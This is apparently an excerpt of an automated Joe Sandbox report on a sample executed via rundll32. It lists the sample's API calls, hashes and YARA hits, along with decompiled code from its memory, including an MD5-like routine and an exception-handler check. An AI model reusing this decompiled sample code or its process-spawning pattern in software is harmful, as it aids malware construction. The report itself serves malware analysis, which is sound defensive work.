                                • API String ID: 4036914670-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0348385A
                                • RtlNtStatusToDosError.NTDLL(C000009A), ref: 03483891
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                • String ID:
                                • API String ID: 2533303245-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 034764E3
                                • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 034764FB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationProcessQuerymemset
                                • String ID:
                                • API String ID: 2040988606-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0348524D
                                • SetLastError.KERNEL32(00000000,?,0347C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 03485254
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$LastStatus
                                • String ID:
                                • API String ID: 4076355890-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 03490327
                                • memset.NTDLL ref: 03490336
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E1D
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E29
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E54
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E03434BF1(void* __ecx, intOrPtr* _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				intOrPtr _v60;
                                				intOrPtr _v64;
                                				intOrPtr _v68;
                                				intOrPtr _v72;
                                				void _v76;
                                				intOrPtr* _t226;
                                				signed int _t229;
                                				signed int _t231;
                                				signed int _t233;
                                				signed int _t235;
                                				signed int _t237;
                                				signed int _t239;
                                				signed int _t241;
                                				signed int _t243;
                                				signed int _t245;
                                				signed int _t247;
                                				signed int _t249;
                                				signed int _t251;
                                				signed int _t253;
                                				signed int _t255;
                                				signed int _t257;
                                				signed int _t259;
                                				signed int _t338;
                                				signed char* _t348;
                                				signed int _t349;
                                				signed int _t351;
                                				signed int _t353;
                                				signed int _t355;
                                				signed int _t357;
                                				signed int _t359;
                                				signed int _t361;
                                				signed int _t363;
                                				signed int _t365;
                                				signed int _t367;
                                				signed int _t376;
                                				signed int _t378;
                                				signed int _t380;
                                				signed int _t382;
                                				signed int _t384;
                                				intOrPtr* _t400;
                                				signed int* _t401;
                                				signed int _t402;
                                				signed int _t404;
                                				signed int _t406;
                                				signed int _t408;
                                				signed int _t410;
                                				signed int _t412;
                                				signed int _t414;
                                				signed int _t416;
                                				signed int _t418;
                                				signed int _t420;
                                				signed int _t422;
                                				signed int _t424;
                                				signed int _t432;
                                				signed int _t434;
                                				signed int _t436;
                                				signed int _t438;
                                				signed int _t440;
                                				signed int _t508;
                                				signed int _t599;
                                				signed int _t607;
                                				signed int _t613;
                                				signed int _t679;
                                				void* _t682;
                                				signed int _t683;
                                				signed int _t685;
                                				signed int _t690;
                                				signed int _t692;
                                				signed int _t697;
                                				signed int _t699;
                                				signed int _t718;
                                				signed int _t720;
                                				signed int _t722;
                                				signed int _t724;
                                				signed int _t726;
                                				signed int _t728;
                                				signed int _t734;
                                				signed int _t740;
                                				signed int _t742;
                                				signed int _t744;
                                				signed int _t746;
                                				signed int _t748;
                                
                                				_t226 = _a4;
                                				_t348 = __ecx + 2;
                                				_t401 =  &_v76;
                                				_t682 = 0x10;
                                				do {
                                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                					_t401 =  &(_t401[1]);
                                					_t348 =  &(_t348[4]);
                                					_t682 = _t682 - 1;
                                				} while (_t682 != 0);
                                				_t6 = _t226 + 4; // 0x14eb3fc3
                                				_t683 =  *_t6;
                                				_t7 = _t226 + 8; // 0x8d08458b
                                				_t402 =  *_t7;
                                				_t8 = _t226 + 0xc; // 0x56c1184c
                                				_t349 =  *_t8;
                                				asm("rol eax, 0x7");
                                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                				asm("rol ecx, 0xc");
                                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                				asm("ror edx, 0xf");
                                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                				asm("ror esi, 0xa");
                                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                				_v8 = _t685;
                                				_t690 = _v8;
                                				asm("rol eax, 0x7");
                                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                				asm("rol ecx, 0xc");
                                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                				asm("ror edx, 0xf");
                                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                				asm("ror esi, 0xa");
                                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                				_v8 = _t692;
                                				_t697 = _v8;
                                				asm("rol eax, 0x7");
                                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                				asm("rol ecx, 0xc");
                                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                				asm("ror edx, 0xf");
                                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                				asm("ror esi, 0xa");
                                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                				_v8 = _t699;
                                				asm("rol eax, 0x7");
                                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                				asm("rol ecx, 0xc");
                                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                				_t508 =  !_t357;
                                				asm("ror edx, 0xf");
                                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                				_v12 = _t410;
                                				_v12 =  !_v12;
                                				asm("ror esi, 0xa");
                                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                				asm("rol eax, 0x5");
                                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                				asm("rol ecx, 0x9");
                                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                				asm("rol edx, 0xe");
                                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                				asm("ror esi, 0xc");
                                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                				asm("rol eax, 0x5");
                                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                				asm("rol ecx, 0x9");
                                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                				asm("rol edx, 0xe");
                                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                				asm("ror esi, 0xc");
                                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                				asm("rol eax, 0x5");
                                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                				asm("rol ecx, 0x9");
                                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                				asm("rol edx, 0xe");
                                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                				asm("ror esi, 0xc");
                                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                				asm("rol eax, 0x5");
                                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                				asm("rol ecx, 0x9");
                                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                				asm("rol edx, 0xe");
                                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                				asm("ror esi, 0xc");
                                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                				asm("rol eax, 0x4");
                                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                				asm("rol ecx, 0xb");
                                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                				asm("rol edx, 0x10");
                                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                				_t599 = _t367 ^ _t420;
                                				asm("ror esi, 0x9");
                                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                				asm("rol eax, 0x4");
                                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                				asm("rol edi, 0xb");
                                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                				asm("rol edx, 0x10");
                                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                				_t338 = _t607 ^ _t422;
                                				asm("ror ecx, 0x9");
                                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                				asm("rol eax, 0x4");
                                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                				asm("rol esi, 0xb");
                                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                				asm("rol edi, 0x10");
                                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                				_t424 = _t734 ^ _t613;
                                				asm("ror ecx, 0x9");
                                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                				asm("rol eax, 0x4");
                                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                				asm("rol edx, 0xb");
                                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                				asm("rol esi, 0x10");
                                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                				asm("ror ecx, 0x9");
                                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                				asm("rol eax, 0x6");
                                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                				asm("rol edx, 0xa");
                                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                				asm("rol esi, 0xf");
                                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                				asm("ror ecx, 0xb");
                                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                				asm("rol eax, 0x6");
                                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                				asm("rol edx, 0xa");
                                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                				asm("rol esi, 0xf");
                                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                				asm("ror ecx, 0xb");
                                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                				asm("rol eax, 0x6");
                                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                				asm("rol edx, 0xa");
                                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                				asm("rol esi, 0xf");
                                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                				asm("ror edi, 0xb");
                                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                				asm("rol eax, 0x6");
                                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                				asm("rol edx, 0xa");
                                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                				_t400 = _a4;
                                				asm("rol esi, 0xf");
                                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                				 *_t400 =  *_t400 + _t259;
                                				asm("ror eax, 0xb");
                                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                				return memset( &_v76, 0, 0x40);
			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction ID: ccaebeeae5bc33edf543cd5dca981655d1465f70d9b449e2dd6ab9401fbbed23
                                • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction Fuzzy Hash: 4422847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 1d644000c0b60c4640ff4544e71da7a6670277de2039b1a8bdc3c06d72c036ec
                                • Instruction ID: bbf356dc88557b272accd51f81a56aa0859731817e189a9afecfee3f73030eb8
                                • Opcode Fuzzy Hash: 1d644000c0b60c4640ff4544e71da7a6670277de2039b1a8bdc3c06d72c036ec
                                • Instruction Fuzzy Hash: B942AF70A00B558FCB25CF69C4806EAF7F2FF49304F5989AEC49A9B755D338A486CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034384C1(long _a4) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				short* _v32;
                                				void _v36;
                                				void* _t57;
                                				signed int _t58;
                                				signed int _t61;
                                				signed int _t62;
                                				void* _t63;
                                				signed int* _t68;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr _t72;
                                				intOrPtr _t75;
                                				void* _t76;
                                				signed int _t77;
                                				void* _t78;
                                				void _t80;
                                				signed int _t81;
                                				signed int _t84;
                                				signed int _t86;
                                				short* _t87;
                                				void* _t89;
                                				signed int* _t90;
                                				long _t91;
                                				signed int _t93;
                                				signed int _t94;
                                				signed int _t100;
                                				signed int _t102;
                                				void* _t104;
                                				long _t108;
                                				signed int _t110;
                                
                                				_t108 = _a4;
                                				_t76 =  *(_t108 + 8);
                                				if((_t76 & 0x00000003) != 0) {
                                					L3:
                                					return 0;
                                				}
                                				_a4 =  *[fs:0x4];
                                				_v8 =  *[fs:0x8];
                                				if(_t76 < _v8 || _t76 >= _a4) {
                                					_t102 =  *(_t108 + 0xc);
                                					__eflags = _t102 - 0xffffffff;
                                					if(_t102 != 0xffffffff) {
                                						_t91 = 0;
                                						__eflags = 0;
                                						_a4 = 0;
                                						_t57 = _t76;
                                						do {
                                							_t80 =  *_t57;
                                							__eflags = _t80 - 0xffffffff;
                                							if(_t80 == 0xffffffff) {
                                								goto L9;
                                							}
                                							__eflags = _t80 - _t91;
                                							if(_t80 >= _t91) {
                                								L20:
                                								_t63 = 0;
                                								L60:
                                								return _t63;
                                							}
                                							L9:
                                							__eflags =  *(_t57 + 4);
                                							if( *(_t57 + 4) != 0) {
                                								_t12 =  &_a4;
                                								 *_t12 = _a4 + 1;
                                								__eflags =  *_t12;
                                							}
                                							_t91 = _t91 + 1;
                                							_t57 = _t57 + 0xc;
                                							__eflags = _t91 - _t102;
                                						} while (_t91 <= _t102);
                                						__eflags = _a4;
                                						if(_a4 == 0) {
                                							L15:
                                							_t81 =  *0x343a380; // 0x0
                                							_t110 = _t76 & 0xfffff000;
                                							_t58 = 0;
                                							__eflags = _t81;
                                							if(_t81 <= 0) {
                                								L18:
                                								_t104 = _t102 | 0xffffffff;
                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                								__eflags = _t61;
                                								if(_t61 < 0) {
                                									_t62 = 0;
                                									__eflags = 0;
                                								} else {
                                									_t62 = _a4;
                                								}
                                								__eflags = _t62;
                                								if(_t62 == 0) {
                                									L59:
                                									_t63 = _t104;
                                									goto L60;
                                								} else {
                                									__eflags = _v12 - 0x1000000;
                                									if(_v12 != 0x1000000) {
                                										goto L59;
                                									}
                                									__eflags = _v16 & 0x000000cc;
                                									if((_v16 & 0x000000cc) == 0) {
                                										L46:
                                										_t63 = 1;
                                										 *0x343a3c8 = 1;
                                										__eflags =  *0x343a3c8;
                                										if( *0x343a3c8 != 0) {
                                											goto L60;
                                										}
                                										_t84 =  *0x343a380; // 0x0
                                										__eflags = _t84;
                                										_t93 = _t84;
                                										if(_t84 <= 0) {
                                											L51:
                                											__eflags = _t93;
                                											if(_t93 != 0) {
                                												L58:
                                												 *0x343a3c8 = 0;
                                												goto L5;
                                											}
                                											_t77 = 0xf;
                                											__eflags = _t84 - _t77;
                                											if(_t84 <= _t77) {
                                												_t77 = _t84;
                                											}
                                											_t94 = 0;
                                											__eflags = _t77;
                                											if(_t77 < 0) {
                                												L56:
                                												__eflags = _t84 - 0x10;
                                												if(_t84 < 0x10) {
                                													_t86 = _t84 + 1;
                                													__eflags = _t86;
                                													 *0x343a380 = _t86;
                                												}
                                												goto L58;
                                											} else {
                                												do {
                                													_t68 = 0x343a388 + _t94 * 4;
                                													_t94 = _t94 + 1;
                                													__eflags = _t94 - _t77;
                                													 *_t68 = _t110;
                                													_t110 =  *_t68;
                                												} while (_t94 <= _t77);
                                												goto L56;
                                											}
                                										}
                                										_t69 = 0x343a384 + _t84 * 4;
                                										while(1) {
                                											__eflags =  *_t69 - _t110;
                                											if( *_t69 == _t110) {
                                												goto L51;
                                											}
                                											_t93 = _t93 - 1;
                                											_t69 = _t69 - 4;
                                											__eflags = _t93;
                                											if(_t93 > 0) {
                                												continue;
                                											}
                                											goto L51;
                                										}
                                										goto L51;
                                									}
                                									_t87 = _v32;
                                									__eflags =  *_t87 - 0x5a4d;
                                									if( *_t87 != 0x5a4d) {
                                										goto L59;
                                									}
                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                									__eflags =  *_t71 - 0x4550;
                                									if( *_t71 != 0x4550) {
                                										goto L59;
                                									}
                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                										goto L59;
                                									}
                                									_t78 = _t76 - _t87;
                                									__eflags =  *((short*)(_t71 + 6));
                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                									if( *((short*)(_t71 + 6)) <= 0) {
                                										goto L59;
                                									}
                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                									__eflags = _t78 - _t72;
                                									if(_t78 < _t72) {
                                										goto L46;
                                									}
                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                										goto L46;
                                									}
                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                										goto L20;
                                									}
                                									goto L46;
                                								}
                                							} else {
                                								goto L16;
                                							}
                                							while(1) {
                                								L16:
                                								__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 + 1;
                                								__eflags = _t58 - _t81;
                                								if(_t58 < _t81) {
                                									continue;
                                								}
                                								goto L18;
                                							}
                                							__eflags = _t58;
                                							if(_t58 <= 0) {
                                								goto L5;
                                							}
                                							 *0x343a3c8 = 1;
                                							__eflags =  *0x343a3c8;
                                							if( *0x343a3c8 != 0) {
                                								goto L5;
                                							}
                                							__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
                                							if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
                                								L32:
                                								_t100 = 0;
                                								__eflags = _t58;
                                								if(_t58 < 0) {
                                									L34:
                                									 *0x343a3c8 = 0;
                                									goto L5;
                                								} else {
                                									goto L33;
                                								}
                                								do {
                                									L33:
                                									_t90 = 0x343a388 + _t100 * 4;
                                									_t100 = _t100 + 1;
                                									__eflags = _t100 - _t58;
                                									 *_t90 = _t110;
                                									_t110 =  *_t90;
                                								} while (_t100 <= _t58);
                                								goto L34;
                                							}
                                							_t25 = _t81 - 1; // -1
                                							_t58 = _t25;
                                							__eflags = _t58;
                                							if(_t58 < 0) {
                                								L28:
                                								__eflags = _t81 - 0x10;
                                								if(_t81 < 0x10) {
                                									_t81 = _t81 + 1;
                                									__eflags = _t81;
                                									 *0x343a380 = _t81;
                                								}
                                								_t28 = _t81 - 1; // 0x0
                                								_t58 = _t28;
                                								goto L32;
                                							} else {
                                								goto L25;
                                							}
                                							while(1) {
                                								L25:
                                								__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 - 1;
                                								__eflags = _t58;
                                								if(_t58 >= 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							__eflags = _t58;
                                							if(__eflags >= 0) {
                                								if(__eflags == 0) {
                                									goto L34;
                                								}
                                								goto L32;
                                							}
                                							goto L28;
                                						}
                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                						__eflags = _t75 - _v8;
                                						if(_t75 < _v8) {
                                							goto L20;
                                						}
                                						__eflags = _t75 - _t108;
                                						if(_t75 >= _t108) {
                                							goto L20;
                                						}
                                						goto L15;
                                					}
                                					L5:
                                					_t63 = 1;
                                					goto L60;
                                				} else {
                                					goto L3;
                                				}
                                			}
                                [Instruction address column for the function above, 0x034384cb through 0x034386de, spilled out of the decompiler view; the per-line address alignment is not recoverable here.]

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 03438572
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: c7a783ec40146d7a44a23c556f36583c33bdcaba62c7f8e23bf874221b87b48e
                                • Instruction ID: 511fe8dee85670cb5e2ee682ce53e68c90971c2ed1cff3566805b7a6f9ec44fa
                                • Opcode Fuzzy Hash: c7a783ec40146d7a44a23c556f36583c33bdcaba62c7f8e23bf874221b87b48e
                                • Instruction Fuzzy Hash: 1861C5706406098FDB59CE29C49066AF3E9FF8F354B28846BF856CF394E731D84E8649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0347F2E3
                                  • Part of subcall function 03485D7A: ResumeThread.KERNEL32(00000004,?,0347F2F7,?), ref: 03485D8F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateProcessResumeThreadUser
                                • String ID:
                                • API String ID: 3393100766-0
                                • Opcode ID: 1b22d8013917b2d06d6208146acb94799df58eeace35f3d04f27662aa6e2231b
                                • Instruction ID: 92c7899baec83e0e3f9c35703c1904efe0365d49a04708553403cd27709b8342
                                • Opcode Fuzzy Hash: 1b22d8013917b2d06d6208146acb94799df58eeace35f3d04f27662aa6e2231b
                                • Instruction Fuzzy Hash: 15F0FF32215209AFDF029F99DC41CDA7FA9FF5D374B05422AF91896120C732DC21DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 034736D3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorStatus
                                • String ID:
                                • API String ID: 1596131371-0
                                • Opcode ID: 449c87d5405e559cb459f67ede550e556bf6434fe41f2abf662d9fe5f6d6d923
                                • Instruction ID: 9a313436f80e7a9bd44e6adac37094219309839d35d57922235cecb1edc3f4ce
                                • Opcode Fuzzy Hash: 449c87d5405e559cb459f67ede550e556bf6434fe41f2abf662d9fe5f6d6d923
                                • Instruction Fuzzy Hash: A2C012365052026BDE59AF50D81892F7B91ABA4350F00441EB14698174C7319450DB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
